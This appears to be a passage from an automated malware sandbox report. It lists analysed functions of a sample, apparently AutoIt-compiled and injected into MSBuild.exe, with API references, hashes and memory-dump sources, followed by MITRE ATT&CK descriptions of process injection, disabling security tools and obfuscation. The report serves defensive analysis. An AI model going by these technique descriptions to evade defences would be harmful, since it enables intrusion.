Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __getbuf__getptd_noexit__lseeki64
String ID: pMC
API String ID: 3311320906-28479520
Opcode ID: ab938ee4f8cae968de0446b2cf227a4f6f554e54e9900e2b432a82228dd739df
Instruction ID: 86bd9078b417f25e5e060e7af24a1e4278a5f4746a1a3fcee4b87b21b77f7262
Opcode Fuzzy Hash: ab938ee4f8cae968de0446b2cf227a4f6f554e54e9900e2b432a82228dd739df
Instruction Fuzzy Hash: 5B411271600A259ED3349B2AE851A7B7BD4AF45320F44861FE4AA8B3D1D77CEC418B1D

Uniqueness

Uniqueness Score: -1.00%

Function 00456B60, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00456BDD

Part of subcall function 0040CAEE: _memmove.LIBCMT ref: 0040CB2F

Strings

AUTOITCALLVARIABLE%d, xrefs: 00456BCF
, $, xrefs: 00456C1D

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: dc2c5b5d342fc311b1b9366c6d0e5fa5b1f635e547ad637f4eb983ca80293d1b
Instruction ID: 74132a1b9da1f69d745c100cef4a6b21c1ba21e071bbae562a3645593c1fa170
Opcode Fuzzy Hash: dc2c5b5d342fc311b1b9366c6d0e5fa5b1f635e547ad637f4eb983ca80293d1b
Instruction Fuzzy Hash: 3E21C371600218AACF11EF95CC82EEE77B9EF44705F50046BF905B7182DB78EA45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042B4BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00434557
___raise_securityfailure.LIBCMT ref: 0043463E

Strings

(L, xrefs: 00434639

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (L
API String ID: 3761405300-64732604
Opcode ID: 5b647bfc66add9b22ed38d1e67e69a50ac803bf7c5b7c1f34d1a6dd2d41ba045
Instruction ID: ffb70eb8ce26d1db7a2227019404884f4400988329486c76bf25df37ff82f799
Opcode Fuzzy Hash: 5b647bfc66add9b22ed38d1e67e69a50ac803bf7c5b7c1f34d1a6dd2d41ba045
Instruction Fuzzy Hash: 6921E4B5591204DBE780DF55F995E513BB4BB48314F10583AE509CB3A1E3F8A980CF8D

Uniqueness

Uniqueness Score: -1.00%

Function 0044C4D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044C4EF
__fread_nolock.LIBCMT ref: 0044C504

Strings

EA06, xrefs: 0044C532

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: fb94a068e1f42a6c8e3411f957d896e42662ca14e4c43f569beb2dac1f1f5193
Instruction ID: e36e0f1789c3cb84a16b167383f7926c35cc9f8eb42ee138b3115780c986b73a
Opcode Fuzzy Hash: fb94a068e1f42a6c8e3411f957d896e42662ca14e4c43f569beb2dac1f1f5193
Instruction Fuzzy Hash: C701F9719002287EEB58DB99C856FFE7BF89F05315F00415FE197D2181E578A7088B60

Uniqueness

Uniqueness Score: -1.00%

Function 0042DA03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__umatherr.LIBCMT ref: 0042DA2A

Part of subcall function 0042DD86: __ctrlfp.LIBCMT ref: 0042DDE5

__ctrlfp.LIBCMT ref: 0042DA47

Strings

xnG, xrefs: 0042DA3E, 0042DA0F

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __ctrlfp$__umatherr
String ID: xnG
API String ID: 219961500-3060101856
Opcode ID: 61e209a109581e4ecc08f2f3eb329614dae8aa7629d3ba94d9b411ae5a7f9816
Instruction ID: 418f1df37aa2ffcdbf081b48981951a12a321d978f01d1c37c0e5507c3a93b1d
Opcode Fuzzy Hash: 61e209a109581e4ecc08f2f3eb329614dae8aa7629d3ba94d9b411ae5a7f9816
Instruction Fuzzy Hash: FFE06571508A0AAADB017F81F90669A7BA5EF14314FC04099F58C14196DFB64474975B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exe PID: 2512 Parent PID: 4588 MSBuild.exeCOMMON

Executed Functions

Function 009EEC48, Relevance: 2.3, APIs: 1, Instructions: 786COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.517452679.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168ecffb2beda64b182e59b0f9f8488e4a9b761cc7e0488f07a9945872820f3d
Instruction ID: ba3d92fa8f743862ad0c63d112580957a36bf179fe71bb942b8e86aec1fdcde7
Opcode Fuzzy Hash: 168ecffb2beda64b182e59b0f9f8488e4a9b761cc7e0488f07a9945872820f3d
Instruction Fuzzy Hash: A9625E31E046188FCB25EF79C95469EB7F1AF89304F1089AAD54AAB350EF309E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00F20A70, Relevance: 9.7, APIs: 4, Strings: 1, Instructions: 980libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F20AFA
KiUserExceptionDispatcher.NTDLL ref: 00F20FE1
LdrInitializeThunk.NTDLL ref: 00F211DB

Strings

x|m, xrefs: 00F222FA

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID: x|m
API String ID: 2638914809-3291047569
Opcode ID: 70ed50ec091e610d7b0882b774a64475f2d8e2a74771a4f7ddf875cd40767834
Instruction ID: 4fa83fea029376033da87e5480db52c4083e66fa48bb49bc59d026abf8dffdc9
Opcode Fuzzy Hash: 70ed50ec091e610d7b0882b774a64475f2d8e2a74771a4f7ddf875cd40767834
Instruction Fuzzy Hash: E5A2F575A04228CFCB64DF70E95869DB7B6BB89309F1084E9D64AA3350CF34AE81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6B1F, Relevance: 6.1, APIs: 4, Instructions: 139threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00ED6BB0
GetCurrentThread.KERNEL32 ref: 00ED6BED
GetCurrentProcess.KERNEL32 ref: 00ED6C2A
GetCurrentThreadId.KERNEL32 ref: 00ED6C83

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9e42708481eaac01a6131f0edcf0a8bdf81893f18113aaa4bbbeb1b9faa1e78d
Instruction ID: ce8cebc5b3a5b80b56bd344a33b93ad11cff6cc7783e63640d23845be1716678
Opcode Fuzzy Hash: 9e42708481eaac01a6131f0edcf0a8bdf81893f18113aaa4bbbeb1b9faa1e78d
Instruction Fuzzy Hash: 995146B09017489FDB15CFA9CA48BDEBBF1EF49314F14849AE049A7361D7746844CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6B50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00ED6BB0
GetCurrentThread.KERNEL32 ref: 00ED6BED
GetCurrentProcess.KERNEL32 ref: 00ED6C2A
GetCurrentThreadId.KERNEL32 ref: 00ED6C83

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cb41b7b5bc2808baf07fe078446f6e51c002db59348eeb7d8dd69dbe4b7493c7
Instruction ID: bb24538481f7373d2458b8217dfeb5f5272028cb1fe3424350e4bd4660349b9d
Opcode Fuzzy Hash: cb41b7b5bc2808baf07fe078446f6e51c002db59348eeb7d8dd69dbe4b7493c7
Instruction Fuzzy Hash: 575122B09006489FDB14CFA9D648BDEBBF4EF88314F20849AE059B7360D774A984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00F21002, Relevance: 3.5, APIs: 2, Instructions: 489libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F211DB

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b851044895463fc661855b84422a9884aa9957d18e83650356c7aa92892494fe
Instruction ID: 668647a3c9ef0721363e2ce56ea36d0a86daa70e7a2151c6a1825fc2b80b5706
Opcode Fuzzy Hash: b851044895463fc661855b84422a9884aa9957d18e83650356c7aa92892494fe
Instruction Fuzzy Hash: 5422E8B5A04228CFCB64DF71D95869DB7BABF88209F1084E9D649A3340CF34AE81DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00F21047, Relevance: 3.5, APIs: 2, Instructions: 482libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F211DB

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5744f30216c5a232df2a456cfe89ddce0275b22fca033e2a1ba2f47006b84ceb
Instruction ID: ada7fd54cadd0b4d2aa28db11bab4bda56df4e3c2030d65ae320ce3b9a5f0e95
Opcode Fuzzy Hash: 5744f30216c5a232df2a456cfe89ddce0275b22fca033e2a1ba2f47006b84ceb
Instruction Fuzzy Hash: 4022F8B5A04228CFCB64DF71D85869DB7BABF88209F1084E9D649A3350CF34AE81DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00F2108C, Relevance: 3.5, APIs: 2, Instructions: 475libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F211DB

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb897e76aac60a6d8bb172fc1fb157d47221687b654f52118071ff57da31de85
Instruction ID: 98a827d09e99361e6e3a52eb6ae54467ad51bb524196fb39b6c6eb1103740a8a
Opcode Fuzzy Hash: eb897e76aac60a6d8bb172fc1fb157d47221687b654f52118071ff57da31de85
Instruction Fuzzy Hash: 1E22F9B5A04228CFCB64DF71D99869D77BABF88205F1084E9D649A3340CF34AE81DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00F2151C, Relevance: 1.8, APIs: 1, Instructions: 307COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F21AF9

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f7ed0cb16c7a8fc7f03cb358a71f2f347107980b8f8c504f8cb42115f3d16ed1
Instruction ID: 64853bcd17c5c549aa8cdf1f58f533732e54eff6779b8c70159d6b14bb6800a7
Opcode Fuzzy Hash: f7ed0cb16c7a8fc7f03cb358a71f2f347107980b8f8c504f8cb42115f3d16ed1
Instruction Fuzzy Hash: 87E1D9B5A04229CFCB64DB30D95875D77B6BB88309F1084E9D609A3340CF35AE81DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00F21564, Relevance: 1.8, APIs: 1, Instructions: 300COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F21AF9

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3e25319a33db53c59c6857bc59f3bc9e82d925b3d4dbca7290d50a462165f317
Instruction ID: 1b5bcd141be4b0c9b992c93ac4938948f687ad6c67e49ca843e648a3f29c958a
Opcode Fuzzy Hash: 3e25319a33db53c59c6857bc59f3bc9e82d925b3d4dbca7290d50a462165f317
Instruction Fuzzy Hash: FED1DAB5A04228CFCB64DB30D95875D77B6BB89309F6084E9D609A3340CF35AE81DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00F215AC, Relevance: 1.8, APIs: 1, Instructions: 291COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F21AF9

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e8963ca6733c610488c61383919a0e5c5500ed7caaef040b630ab0c1199efedb
Instruction ID: 1068479d250d77492ddaa069a25d3ba9683be8b3e7c42335680d1765f7e94e36
Opcode Fuzzy Hash: e8963ca6733c610488c61383919a0e5c5500ed7caaef040b630ab0c1199efedb
Instruction Fuzzy Hash: 61D1DBB5A04228CFCB64DB30D95879D77B6BB88309F6084E9D609A3341CF35AD81DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00F215E8, Relevance: 1.8, APIs: 1, Instructions: 286COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F21AF9

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d206e249abaf8d0a9d2e3773e07cb452789da8d11c81be3c2a360464f73a54a2
Instruction ID: 4d2e6ce745682bb1d040228e36cf441396c2bf567f8f02ada810eb43f9f1b406
Opcode Fuzzy Hash: d206e249abaf8d0a9d2e3773e07cb452789da8d11c81be3c2a360464f73a54a2
Instruction Fuzzy Hash: 68D1DAB5A04228CFCB64DB30D95879D77B6BB88309F5084E9D609A3341CF35AD81DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00F21630, Relevance: 1.8, APIs: 1, Instructions: 279COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F21AF9

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 480e7b2bfcf6a0365eb356ac38c4c162ffe9e97f3fddfe920cd22f73e1f5f01f
Instruction ID: 121feeb4af9cf7f8b7034db12b2df34c80e1f41e993d6c14f7e5c29b31773ec7
Opcode Fuzzy Hash: 480e7b2bfcf6a0365eb356ac38c4c162ffe9e97f3fddfe920cd22f73e1f5f01f
Instruction Fuzzy Hash: FBD1DBB5A04228CFCB64DB30D99879D77B6BB88309F5084E9D609A3341CF35AD81DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00F21678, Relevance: 1.8, APIs: 1, Instructions: 272COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F21AF9

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9aeef6ec6a43400cc25030970209ffa6c30c860b0d49386930661d99176f1166
Instruction ID: 3327a1592051f2ebc1afa7d40218d0aeb2d2108e4636562ede26d5478ad413fd
Opcode Fuzzy Hash: 9aeef6ec6a43400cc25030970209ffa6c30c860b0d49386930661d99176f1166
Instruction Fuzzy Hash: FDC1EBB5A05228CFCB64DB30D95879D77B6BB88309F5084E9D609A3340CF35AD81DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00F216C0, Relevance: 1.8, APIs: 1, Instructions: 265COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F21AF9

Memory Dump Source

Source File: 00000003.00000002.518207883.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8e532adb929e8e2314bfdacfdad111872ccf774ca7d81f1c688a05aa8423b529
Instruction ID: 99de8e5b2e0459cc5c8dbcc7f436ae854dda909b4c6d23b74a67c0bc8fbb1e3b
Opcode Fuzzy Hash: 8e532adb929e8e2314bfdacfdad111872ccf774ca7d81f1c688a05aa8423b529
Instruction Fuzzy Hash: 04C1DBB5A04228CFCB64DB30D99879D77B6BB88309F5084E9D609A3341CF35AD81DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00ED5184, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00ED52A2

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ce4ba919a8c17eda4e28ddd6e65b252410cdfe7cdab864c1be0dc5d869e44398
Instruction ID: b5add5e5bc733aed3599a189026c66e421b5eb331cd368f1dac79453a92e7fab
Opcode Fuzzy Hash: ce4ba919a8c17eda4e28ddd6e65b252410cdfe7cdab864c1be0dc5d869e44398
Instruction Fuzzy Hash: C051BFB1D103099FDB14CFA9C984ADEBBB5FF48314F24812AE819AB260D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED5190, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00ED52A2

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0b0bd02c3932a46a3817230f19a9c1aff0b669b27651d0182021f69481406a9c
Instruction ID: dda12897217a4506f1ca20f891abc79c579a150354c628f7a0dc98fe8d16cca4
Opcode Fuzzy Hash: 0b0bd02c3932a46a3817230f19a9c1aff0b669b27651d0182021f69481406a9c
Instruction Fuzzy Hash: 6541CEB1D103099FDF14CF99C984ADEBBB5FF48314F24822AE819AB220D774A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00ED7D01

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a393c81c5b320cfddb4139cf80753263c447b94ee8b956d4dd6dde2c1023349e
Instruction ID: f57b57da5442a6d1274ae46813b46b23a70ba2e0a7932aab59d6065cb1478ae3
Opcode Fuzzy Hash: a393c81c5b320cfddb4139cf80753263c447b94ee8b956d4dd6dde2c1023349e
Instruction Fuzzy Hash: 80413AB49002098FCB14CF99C548AAAFBF5FF89314F24C859E459AB325D774A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6D72, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ED6DFF

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b9ef8fddab5b5c7f56a0f304bd145152f95d4191334f2aabc68b3bd4967d9def
Instruction ID: 8eefc6ac2589abb2c75c12c54a7edf9b1eb318c7b13df481209582ace5d64dc7
Opcode Fuzzy Hash: b9ef8fddab5b5c7f56a0f304bd145152f95d4191334f2aabc68b3bd4967d9def
Instruction Fuzzy Hash: 862114B5D012089FCB10CFA9D584AEEBBF9FB48324F14841AE954B3350C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ED6DFF

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d614a250c9cc8e020aaeee0566e0ca2e9f4585d56c9f3d77c151e82967e01c0c
Instruction ID: 0feb45f2815d53fcb11ac9fe258289f047f5123c0d619eb09bcab7de9d628cea
Opcode Fuzzy Hash: d614a250c9cc8e020aaeee0566e0ca2e9f4585d56c9f3d77c151e82967e01c0c
Instruction Fuzzy Hash: EE21E4B5D002089FDB10CF99D984ADEBBF8EB48324F14841AE914B3350D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EDBD78, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00EDBE02

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 31aaca367899f2ce9a171d15426cf82479d85f9a6428b46140b6386e139f17f5
Instruction ID: 0e20f3c103aee2b33930fc4e45e9d48d526ddcc54277c0a148fd1f109809231c
Opcode Fuzzy Hash: 31aaca367899f2ce9a171d15426cf82479d85f9a6428b46140b6386e139f17f5
Instruction Fuzzy Hash: 2D2156B29043498FCB10DFA9C6487DABBF4FB08318F60886AD505B3200D778A9058FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EDBD88, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00EDBE02

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 9f8e528bdc0400e9db493e9f527394ac02fa7625b849e2d11a80dd9a7b94b786
Instruction ID: 36ebdabd57ef92183c0f210351f8c1180090fbc6ccab9c414682d6a64624705e
Opcode Fuzzy Hash: 9f8e528bdc0400e9db493e9f527394ac02fa7625b849e2d11a80dd9a7b94b786
Instruction Fuzzy Hash: 9E1189B1A043498FCB10DFA9C6487DEBBF4FB44318F20846AD405B3340D77869058FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2F44, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00ED4216

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 564c44217284ab543fa5fc9ecfbbee1e2f7e43eae5f9a6def3530d715e6bb0fe
Instruction ID: ba604de99e58c0b3c0ea0f3671c9e2226a6a573645a43bf02891c3152bf51f09
Opcode Fuzzy Hash: 564c44217284ab543fa5fc9ecfbbee1e2f7e43eae5f9a6def3530d715e6bb0fe
Instruction Fuzzy Hash: 4611F3B5C016498FCB10CF9AD548BDEBBF4EB49314F14841AD459B7750C374A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED41AA, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00ED4216

Memory Dump Source

Source File: 00000003.00000002.518099977.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e3c56c340f0bcfed30fb5c7da9798a72c242a10435a106a7702ad670a40538b3
Instruction ID: 80c9471d41c3e8d70101a375c8b3d4f0f7b9b41ab9887d01daa679cde6b70ef0
Opcode Fuzzy Hash: e3c56c340f0bcfed30fb5c7da9798a72c242a10435a106a7702ad670a40538b3
Instruction Fuzzy Hash: F51123B6C002498FCB20CF9AD484BDEBBF5EB88314F14841AD459B3250C374A546CFA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
